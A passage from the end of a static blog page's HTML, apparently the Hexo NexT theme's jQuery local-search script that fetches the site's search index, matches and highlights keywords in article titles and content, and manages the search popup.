      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  

  

  

</body>
</html>
